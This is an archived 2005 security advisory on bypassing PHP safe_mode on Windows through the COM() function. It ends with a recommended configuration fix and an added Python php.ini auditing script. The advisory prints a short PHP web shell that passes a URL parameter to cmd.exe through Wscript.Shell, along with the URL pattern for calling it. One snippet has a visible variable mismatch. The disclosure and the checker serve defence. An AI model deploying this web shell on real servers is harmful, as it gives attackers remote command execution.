📁 A collection of articles published on www.xfocus.org
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>PHP COM Component Invocation Bypasses Safe Mode to Execute Arbitrary Files</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="Keywords" content="xfocus, honeynet, honeypot, forensic, intrusion detection, wireless security, security forums, security tools, exploits, security advisories, security vulnerabilities, security tutorials, security training, security help, security standards, security code, security resources, security programming, cryptography, kEvin1986, Saiy, 我非我, wofeiwo, PHP, safe mode, arbitrary command execution, privilege escalation" />
<link rel="stylesheet" href="../../css/plone.css" type="text/css">
</head>

<body bgcolor="#FFFFFF" text="#000000">
<table class="columns">
  <tr>
    <td class="main">
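	  <h1>PHP COM Component Invocation Bypasses Safe Mode to Execute Arbitrary Files</h1><br>Created: 2005-03-22<br>Article type: Original<br>Submitted by: <a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=76923'>kevin1986</a> (kevin7c2_at_yahoo.com.cn)<br><br>Discovery date: 2005-02-10<br />
<br />
Affected systems:<br />
PHP versions on Windows that support the COM() function<br />
<br />
Discovered by:<br />
Saiy\我非我 From <a href='http://www.wrsky.com' target='_blank'>http://www.wrsky.com</a> &amp; kEvin1986<br />
Saiy:dawangs_at_etang.com<br />
kEvin1986:Garnett1986_at_hotmail.com<br />
我非我:wofeiwo_at_bugkidz.org<br />
<br />
我非我:<br />
<br />
Description:<br />
<br />
A security vulnerability in the PHP scripting platform on Windows means that, even with PHP's safe mode (safe_mode) enabled, an attacker can still use the COM() function to create system components and execute arbitrary commands.<br />
The cause is that, although the system() and passthru() functions are prohibited on a PHP platform running in safe mode, com.allow_dcom is still set to true, so an attacker can use the COM() function to create system component objects and run system commands. With a default Apache configuration, or when the web server runs with LocalSystem or Administrators privileges, the attacker can use this vulnerability to escalate privileges.<br />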
<br />
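Test program:<br />
-----------------------------------------------------------------<br />
<br />
Warning<br />
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!<br />
<br />
/* Requires Windows Script Host 5.6 */<br />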
&lt;?php<br />
$phpwsh=new COM(&quot;Wscript.Shell&quot;) or die(&quot;Create Wscript.Shell Failed!&quot;);<br />
$phpexec=$phpwsh-&gt;exec(&quot;cmd.exe /c $cmd&quot;);<br />
$execoutput=$wshexec-&gt;stdout();<br />
$result=$execoutput-&gt;readall();<br />
echo $result;<br />
?&gt;<br />
<br />
/* For Windows Script Host versions below 5.6 */<br />
&lt;?php<br />
$phpwsh=new COM(&quot;Wscript.Shell&quot;) or die(&quot;Create Wscript.Shell Failed!&quot;);<br />
$phpwsh-&gt;run(&quot;cmd.exe /c $cmd &gt; c:\\inetpub\\wwwroot\\result.txt&quot;);<br />
?&gt;<br />
<br />
After saving the code above as a *.php file, it can be executed from a browser:<br />
<a href='http://www.target.com/simple.php?cmd=[Command]' target='_blank'>http://www.target.com/simple.php?cmd=[Command]</a><br />
<br />
---------------------------------------------------------------<br />
Patch:<br />
PHP has not yet replied to the discoverers' e-mail and has not released any related patch.<br />
<br />
Recommendation:<br />
After enabling safe mode, change com.allow_dcom=true to com.allow_dcom=false.<br />
<br />
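Added example (not part of the original advisory and not code from the PHP project): a small Python check that reads php.ini text and reports the safe_mode plus com.allow_dcom combination described above. The two php.ini fragments are constructed samples, and the disable_classes check is an extra assumption of this example rather than the advisory's recommendation.<br />
<pre>
```python
TRUE_VALUES = {"1", "on", "true", "yes"}

# Constructed sample php.ini fragments (not taken from any real server).
WEAK_INI = """
[PHP]
safe_mode = On            ; safe mode enabled
[COM]
com.allow_dcom = true     ; the setting the advisory warns about
"""
FIXED_INI = """
[PHP]
safe_mode = On
disable_classes = COM
[COM]
com.allow_dcom = false
"""

def parse_ini(text):
    """Return {directive: value} from php.ini text; a later line overrides an earlier one."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # strip ; comments
        if not line or line.startswith("[") or "=" not in line:
            continue                              # blank line or [section] header
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"').lower()
    return settings

def audit(text):
    """Return findings for the safe_mode plus COM combination in the advisory."""
    s = parse_ini(text)
    if s.get("safe_mode", "off") not in TRUE_VALUES:
        return []                                 # advisory concerns safe_mode hosts
    findings = []
    dcom = s.get("com.allow_dcom")
    if dcom is None:
        findings.append("com.allow_dcom is not set explicitly")
    elif dcom in TRUE_VALUES:
        findings.append("com.allow_dcom is true while safe_mode is on")
    # Extra check added by this example, not part of the advisory.
    disabled = {c.strip() for c in s.get("disable_classes", "").split(",")}
    if "com" not in disabled:
        findings.append("COM is not listed in disable_classes")
    return findings

if __name__ == "__main__":
    for name, text in (("weak", WEAK_INI), ("fixed", FIXED_INI)):
        print(name, audit(text))
```
</pre>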
Thanks:<br />
The <a href='http://www.4ngel.net' target='_blank'>www.4ngel.net</a> security team, for their active testing.
	</td>
  </tr>
</table>
<div class="footer">
  Copyright &copy; 1998-2003 XFOCUS Team. All Rights Reserved
</div>
</body>
</html>
